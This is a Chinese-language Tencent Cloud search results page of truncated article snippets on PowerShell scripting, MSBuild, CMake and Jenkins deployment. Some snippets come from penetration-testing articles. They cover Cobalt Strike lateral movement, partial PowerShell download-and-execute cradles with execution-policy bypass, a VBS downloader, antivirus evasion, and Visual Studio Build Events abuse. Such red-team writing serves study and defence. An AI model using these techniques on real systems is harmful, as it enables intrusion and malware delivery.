文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

PowerShell系列(五):PowerShell通过脚本方式运行笔记

上一篇文章讲解了Powershell通过交互环境运行命令的相关知识,今天给大家介绍实际工作当中使用最频繁的方式——通过脚本运行,简单来说就是和咱们实际编写代码一样,先编写代码,然后通过开发工具执行。...同样的为了实现PowerShell脚本的保存、方面在别的服务器迁移,一般都是先编写脚本,然后通过脚本文件执行完成相应的运维任务。...\test.ps1  #运行命令2、直接指定完整文件路径执行完整psl1脚本文件F:\桌面\test.ps1具体如下图3、通过cmd命令直接执行需要加关键字PowerShell才可以识别是执行的PowerShell...命令格式:PowerShell  ps1脚本文件完整路径4、通过Windows计划任务执行PowerShell脚本PowerShell 脚本默认无法执行,需要先修改 PowerShell 执行策略(ExecutionPolicy...3、  脚本编写效率大大提高。交互执行的方式会存在脚本思维的跳跃。不利于脚本整体逻辑的把控。4、  定时任务的实现。通过脚本方式可以很方便的脚本文件周期重复性执行,这样就达到了定时任务的目的。

4.2K41

TotalCommander 设置 VisualStudio 开发者命令行

而在进行开发,需要使用的命令行推荐使用 VisualStudio 开发命令行,因为在开发者命令行 Developer Command Prompt 提供了很多预定义的命令,包括 NuGet 和 MSBuild...这些命令 在TotalCommander的工具右击点击更改 ?...Tools\VsDevCmd.bat" 我是使用 VisualStudio 2019 企业版,如果是其他的版本,那么上面的代码和我不相同 这里的 %comspec% 的意思就是 cmd.exe 也就是通过命令行执行脚本...命令 还是和上面步骤相同,找到 PowerShell 版本的 Developer PowerShell for VS 2019 快捷方式,右击属性可以看到下面代码 C:\Windows\SysWOW64...和参数放在工具的命令和参数,同时参数需要加上 ; cd %P 才能让 PowerShell 跳转到文件夹 这里的 ; cd %P 是通过 ; 让 PowerShell 执行多语句,而 %P 是 TotalCommander

1.2K10
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

    渗透测试人员和红队通过通过执行powershell.exe在远程主机上面运行经过base64编码的命令来完成横向移动,然后返回到目标的会话。...的脚本,该脚本对内存中运行的嵌入式的payloads 进行一个base64的编码,并将其压缩为单行代码,连接到ADMIN或者是C share并且运行Powershell命令。...另外,发送的命令是通过命名管道发送的,该管道在CS中具有默认名称(可以更改)。 Red Canary撰写了一篇有关检测它的出色文章。...这可以通过Powershell中的命令完成,也可以通过WMI和Powershell远程完成: Enable-PSRemoting -Force 从非CS的角度来看(用您的二进制文件替换calc.exe)...我出色的同事Matt Nelson通过Microsoft管理控制台(MMC)2.0脚本对象模型中的ExecuteShellCommand方法,通过DCOM发现了一种横向移动技术,该方法用于系统管理服务器的管理功能

    4.9K10

    进攻性横向移动

    它首先创建一个 PowerShell 脚本,该脚本将对嵌入式有效负载进行 base64 编码,该有效负载从内存运行并压缩为单线,连接到 ADMIN$ 或 C$ 共享并运行 PowerShell 命令,如下所示...此外,发送的命令是通过命名管道发送的,命名管道在 CS 中有一个默认名称(但可以更改)。Red Canary写了一篇很棒的文章来检测它。...这可以通过 Powershell 中的命令完成,也可以通过 WMI 和 Powershell 远程完成: 启用-PSRemoting -Force 从非 CS 的角度来看(用您的二进制文件替换 calc.exe...命令,而无需通过非托管进程(二进制编译为机器代码)生成 Powershell。...我杰出的同事Matt Nelson通过 DCOM发现了一种横向移动技术,通过 Microsoft 管理控制台 (MMC) 2.0 脚本对象模型中的 ExecuteShellCommand 方法,该模型用于系统管理服务器管理功能

    3K10

    CMake构建学习笔记14-依赖库管理工具

    不能使用CMake的GUI工具,因为不同的库各自有自己独特的构建选项,最好将其通过脚本记录。不妨将构建的脚本写的完善一点,自动化一点,代码文件从哪里来,最后的构建成果输出到哪里。...例如,前面博文中构建libzip库的完整Powershell脚本libzip.ps1为: param( [string]$SourceAddress = "https://github.com...不过,这样一个一个调用脚本也说不上对库包进行管理了,对比一下一些比较完善的包管理器例如npm,可以再写一个总的用于管理的脚本,将以上构建脚本管理起来,如下Powershell脚本BuildCppDependency.ps1.../$item.ps1"; & $BuildScript -Generator $Generator -MSBuild $MSBuild -InstallDir...} 再次感叹下Powershell脚本的强大,你甚至可以看到System.Collections.Generic.SortedSet,没错,这就是.Net提供的容器,通过Powershell可以也调用它

    50310

    Windows上传并执行恶意代码的N种姿势

    简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell的,利用宏执行...echo写入vbs脚本,再通过cscript来执行 ● echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro...执行方法 Powershell 对于某些无文件渗透场景,powershell可以直接加载到内存执行是很常见的 powershell IEX (New-Object Net.WebClient...\v4.0.30319\MSBuild.exe" & !...NET程序集最初只是读取权限,为了枚举与二进制文件相关联的方法和属性,又将权限更改为执行。所以这种方法只能执行C#编译的程序。

    6.1K31

    渗透技巧 | Windows上传并执行恶意代码的N种姿势

    简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell...下载方法 Powershell powershell是最著名的一种方法了,一般的文件下载命令如下 powershell -exec bypass -c (new-object System.Net.WebClient...写入vbs脚本,再通过cscript来执行 ● echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro...\v4.0.30319\MSBuild.exe" & !...NET程序集最初只是读取权限,为了枚举与二进制文件相关联的方法和属性,又将权限更改为执行。所以这种方法只能执行C#编译的程序。

    4.5K51

    如何在 MSBuild 的项目文件 csproj 中获取绝对路径

    在 MSBuild 4.0 中,可以在 csproj 中编写调用 PowerShell 脚本的代码,于是获取一个路径的绝对路径就非常简单: 1 [System.IO.Path]::GetFullPath...WalterlvRelativePath))) 这样,就可以使用 $(_WalterlvAbsolutePath) 属性来获取绝对路径...你可以阅读我的其他篇博客了解到 $(OutputPath) 其实最终都会是相对路径: 项目文件中的已知属性(知道了这些,就不会随便在 csproj 中写死常量啦) - walterlv 如何更精准地设置...(包括添加和删除各种前后缀) - walterlv ---- 参考资料 How can I get MSBUILD to evaluate and print the full path when given...- Stack Overflow Demonstrates how you can convert a relative path to an absolute path in MSBuild 本文会经常更新

    3.7K30

    Active Directory渗透测试典型案例(2) 特权提升和信息收集

    具体而言,默认情况下,计算机可以更改与其权限相关的某些属性,例如msDS-AllowedToActOnBehalfOfOtherIdentity。...具体而言,默认情况下,计算机可以更改与其权限相关的一些属性,例如msDS-AllowedToActOnBehalfOfOtherIdentity。...这是LAB\system 10.ADAPE 就我个人而言,我写了一个名为adape的脚本——Active Directory评估和权限提升脚本 ADAPE是用PowerShell编写的,它使用几个不同的其他工具的函数...在我的参与和评估中,我经常运行一些PowerShell脚本来帮助识别下一个目标,检查错误的组策略设置,AD错误配置,缺少补丁等。...所需的所有脚本都是混淆的PowerShell并包含在内,因此它应该绕过大多数基本的AV防御解决方案。默认情况下,它将关闭Windows Defender。

    3.8K20

    .Net在Windows上使用Jenkins做CICD的那些事

    /zh/download/ git https://git-scm.com/download/win OpenSSH服务端 https://github.com/PowerShell/Win32-OpenSSH...安装MsBuild   在服务器47.115.111.58打开通过上面表格的链接下载VS的安装包,点开单个组件选项卡,勾选Msbuild,等待一会即可完成。 ?...configuration> 安装OpenSSH服务端   根据上面表格的地址下载解压后,在服务器47.115.151.108以管理员启动CMD cd C:\tools\OpenSSH-Win64 #安装服务端 powershell.exe...输入完管理员账号后这个时候可以去修改workspace的地址,当时我没有修改地址的时候,因为路径有特殊字符导致无论如何都无法用msbuild编译通过。   ...打开C:\Windows\System32\config\systemprofile\AppData\Local\Jenkins.jenkins\config.xml,修改workspaceDir属性的值为

    2.4K31

    Jenkins 流水线远程部署 .NET CoreFramework 到 IIS

    WebDeploy WebDeploy 是一个 IIS 远程部署工具,通过 WebDeploy 我们可以很方便地打包应用远程部署到 IIS 中,而不需要手动重启、更替网站文件、重启程序池等。...就是把 agent.jar 放到目录中,然后打开 powershell 或者 cmd,复制上面的 Java -jar agent.jar -jnlpUrl ..... 命令,直接执行就行。...在本节中,将介绍如何配置 .NET Framework 自动化流水线的构建,使用 Jenkins 配置流水线,编写 Jenkins 脚本等。...对于需要发布的 Web 项目需要定义 Web 发布属性,自动化构建中,依赖这些提前配置的属性,这些属性会生成一个 .pubxml 文件,随源代码一起上传到仓库。...我可以编写流水线脚本,将前端文件通过 WebDeploy 自动打包发布到此网站中。 接着,在后端网站中,添加一个虚拟目录,目录跟前端网站的目录一致。

    3.3K40

    远控免杀从入门到实践——工具总结篇

    TheFatRat 创建的后门格式和支持的平台比较多样化,而且还支持生成 CDROM/U 盘中能自动运行 (生成 AutoRun 文件) 的后门文件,并且可以对 payload 更改图标,具有一定伪装效果...Unicorn 使用比较简单,可以生成 powershell 代码、macro 宏代码、hta、dde 等格式的 payload 文件,可以在社工时直接使用,不过因为生成的代码关键字比较明显,所以静态查杀很多都没通过...通过在项目或解决方案文件中调用 msbuild.exe,可以在未安装 Visual Studio 的环境中编译和生成程序。...2、Msbuild.exe:Microsoft Build Engine 是一个用于构建应用程序的平台。这个引擎,也称为 MSBuild。...SpookFlare 使用了多种方式进行免杀,exe 的免杀可能效果不算太出色,但是对 powershell 脚本和 hta 文件等的免杀做的还是不错的,基本静态查杀都能 bypass。

    4.7K21

    0.C#Make自动化构建-简介

    1.1 下载引导脚本 首先第一步下载一个基于Powershell的引导脚本文件build.ps1,这个文件并不是必须的,你可以直接用调用cake脚本文件),在项目所在的目录下运行: Invoke-WebRequest...其次,创建了一个名为build的Task,这个task调用MSBuild来build我们的项目。...原因是我的一个Demo.Tests这个项目引用了xUnit的包,MSBuild没能正确的还原nuget包,这不知道算不算一个bug,笔者之前用 Cake的MSBuild来build vs2015的项目的时候是没有问题的...再者,我们可以通过它来简化对Cake的调用,比如上面列出来的几个task,我们可以通过传递参数给build.ps1,来运行我们指定的task(默认运行了default嘛)。比如: ?...总结 得益于Cake基于C#DSL来编写脚本,相比写Powershell或者其他的脚本来完成自动化构建,使得C#开发人员非常容易上手。

    2K50

    开源项目使用 appveyor 自动构建

    appveyor.yml 文件,也就是说这个配置文件可以不手写,可以在网页上经过配置自动创建 接下来使用我的编码规范工具作为例子告诉大家如何做设置 按照标签提供的方向,一个个进入,第一项是总的配置,一般不需要做更改...在这个环境标签还可以设置编译时的环境变量和 HOST 等 在准备完成了环境,下一步就是 Build 了,在开始选择了自己的项目之后,在自动构建里面将会自动识别这是一个 .NET 的程序,可以使用 msbuild...此时需要点击添加脚本命令,可以看到提供的脚本有 PowerShell 和 .NET Core 版本的 PowerShell 和 Cmd 等脚本方式,我这里选择使用 Cmd 脚本 在使用的 VisualStudio...,此时提交上去将会编译不通过。...在提交的时候自动构建,可以快速告诉开发当前的提交是否会让项目编译不通过,在刚做出逗比代码的时候发现是哪里逗比需要的时间很短,这样会比我随意提交一些代码到仓库,然后其他小伙伴拉代码发现编译不通过时需要找到逗比代码的时间短很多

    1.5K20

    Lazarus APT攻击手法之利用Build Events特性执行代码复现

    view=vs-2019 微软文档中说“通过指定自定义构建事件,我们可以在构建开始之前或构建完成之后自动运行命令,仅当构建成功达到构建过程中的那些点时,构建事件才会运行”,例如: 可以在构建开始之前运行...在Lazarus组织中是利用Visual Studio进行利用的,那么我们来复现一下利用手法: 1.打开Visual Studio 2.新建一个项目 3.进入项目的属性 就可以看到了,正如上面看到的具有...在cobalt strike种直接生成powershell的恶意脚本。 ? 把命令放在visual studio中 ? 应用然后编译 ? 可以看到直接上线。...保存然后编译一下,但是发现并不能成功利用,通过查看微软文档知道我们还需要构建一个输出叁数。 ? 然后编译,弹出计算机 ? 图形化的利用在 ?...具体的利用手法前辈们总结好了 https://www.cnblogs.com/backlion/p/10490573.html 这里补充一些利用手法吧 执行powershell命令 这里参考3gstudent

    1.7K10
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券